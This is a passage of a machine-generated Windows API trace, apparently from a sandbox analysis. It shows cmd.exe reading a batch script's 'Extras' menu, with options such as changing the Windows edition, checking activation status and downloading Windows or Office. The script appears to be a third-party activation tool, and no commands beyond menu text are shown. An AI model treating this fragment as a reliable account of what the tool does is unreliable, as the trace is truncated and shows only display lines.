(in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2aa2 [0181.187] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.187] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10916, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2aa4 [0181.187] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nxtras\r\n") returned 2 [0181.187] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.187] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2aa4 [0181.187] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.187] GetFileType (hFile=0x9c) returned 0x1 [0181.187] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2aa4 [0181.187] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.187] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10921, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2aa9 [0181.187] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="cls\r\nas\r\n") returned 5 [0181.187] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.187] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2aa9 [0181.187] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.188] GetFileType (hFile=0x9c) returned 0x1 [0181.188] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2aa9 [0181.188] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.188] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10936, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ab8 [0181.188] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="title Extras\r\n", cbMultiByte=15, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="title Extras\r\n===========================================================================================================================\r\n") returned 15 [0181.188] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.188] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ab8 [0181.188] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.188] GetFileType (hFile=0x9c) returned 0x1 [0181.188] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ab8 [0181.188] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.188] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10949, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ac5 [0181.188] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="mode 76, 30\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="mode 76, 30\r\n\r\n") returned 13 [0181.188] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.188] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ac5 [0181.188] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.188] GetFileType (hFile=0x9c) returned 0x1 [0181.188] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ac5 [0181.188] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.188] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10956, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2acc [0181.188] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n, 30\r\n") returned 7 [0181.188] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.188] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2acc [0181.189] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.189] GetFileType (hFile=0x9c) returned 0x1 [0181.189] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2acc [0181.189] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.189] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10963, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ad3 [0181.189] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0181.189] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.189] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ad3 [0181.189] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.189] GetFileType (hFile=0x9c) returned 0x1 [0181.189] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ad3 [0181.189] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.189] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10970, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ada [0181.189] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0181.189] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.189] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ada [0181.189] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.189] GetFileType (hFile=0x9c) returned 0x1 [0181.189] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ada [0181.189] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.189] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10977, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ae1 [0181.189] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0181.190] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.190] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ae1 [0181.190] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.190] GetFileType (hFile=0x9c) returned 0x1 [0181.190] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ae1 [0181.190] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.190] SetFilePointer (in: hFile=0x9c, lDistanceToMove=10984, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ae8 [0181.190] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0181.190] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.190] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ae8 [0181.190] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.190] GetFileType (hFile=0x9c) returned 0x1 [0181.190] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ae8 [0181.190] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.192] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11060, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2b34 [0181.192] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: ______________________________________________________________\r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: ______________________________________________________________\r\n==============================================================\r\n") returned 76 [0181.192] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.192] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2b34 [0181.192] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.192] GetFileType (hFile=0x9c) returned 0x1 [0181.192] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2b34 [0181.192] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.192] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11067, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2b3b [0181.192] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n ______________________________________________________________\r\n") returned 7 [0181.192] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.192] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2b3b [0181.192] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.192] GetFileType (hFile=0x9c) returned 0x1 [0181.192] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2b3b [0181.192] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.192] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11113, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2b69 [0181.193] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [1] Change Windows Edition\r\n", cbMultiByte=46, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [1] Change Windows Edition\r\n____________________________\r\n") returned 46 [0181.193] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.193] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2b69 [0181.193] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.193] GetFileType (hFile=0x9c) returned 0x1 [0181.193] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2b69 [0181.193] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.193] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11120, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2b70 [0181.193] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n [1] Change Windows Edition\r\n") returned 7 [0181.193] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.193] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2b70 [0181.193] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.193] GetFileType (hFile=0x9c) returned 0x1 [0181.193] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2b70 [0181.193] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.193] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11164, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2b9c [0181.193] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [2] Extract $OEM$ Folder\r\n", cbMultiByte=44, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [2] Extract $OEM$ Folder\r\n\r\n") returned 44 [0181.193] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.193] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2b9c [0181.193] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.193] GetFileType (hFile=0x9c) returned 0x1 [0181.193] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2b9c [0181.193] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.194] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11171, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ba3 [0181.194] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n [2] Extract $OEM$ Folder\r\n") returned 7 [0181.194] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.194] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ba3 [0181.194] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.194] GetFileType (hFile=0x9c) returned 0x1 [0181.194] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ba3 [0181.194] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.194] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11218, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd2 [0181.194] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [3] Activation Status [vbs]\r\n", cbMultiByte=47, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [3] Activation Status [vbs]\r\n___________________________\r\n") returned 47 [0181.194] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.194] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd2 [0181.194] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.194] GetFileType (hFile=0x9c) returned 0x1 [0181.194] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd2 [0181.194] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.194] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11225, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd9 [0181.194] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n [3] Activation Status [vbs]\r\n") returned 7 [0181.194] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.194] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd9 [0181.194] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.194] GetFileType (hFile=0x9c) returned 0x1 [0181.194] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd9 [0181.194] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.195] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11282, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2c12 [0181.195] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [4] Download Genuine Windows / Office\r\n", cbMultiByte=57, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [4] Download Genuine Windows / Office\r\n_________________\r\n") returned 57 [0181.195] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.195] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2c12 [0181.195] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.195] GetFileType (hFile=0x9c) returned 0x1 [0181.195] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2c12 [0181.195] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.195] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11358, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2c5e [0181.195] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: __________________________________________________ \r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: __________________________________________________ \r\n") returned 76 [0181.195] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.195] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2c5e [0181.195] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.195] GetFileType (hFile=0x9c) returned 0x1 [0181.195] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2c5e [0181.195] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.195] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11434, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2caa [0181.196] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: \r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: \r\n") returned 76 [0181.196] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.196] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2caa [0181.196] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.196] GetFileType (hFile=0x9c) returned 0x1 [0181.196] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2caa [0181.196] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.196] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11473, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2cd1 [0181.196] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [0] Go to Main Menu\r\n", cbMultiByte=39, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [0] Go to Main Menu\r\n \r\n") returned 39 [0181.196] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.196] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2cd1 [0181.196] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.196] GetFileType (hFile=0x9c) returned 0x1 [0181.196] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2cd1 [0181.196] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.196] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11549, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2d1d [0181.196] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: ______________________________________________________________\r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: ______________________________________________________________\r\n") returned 76 [0181.197] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.197] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2d1d [0181.197] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.197] GetFileType (hFile=0x9c) returned 0x1 [0181.197] SetFilePointer (in: hFile=0x9c, 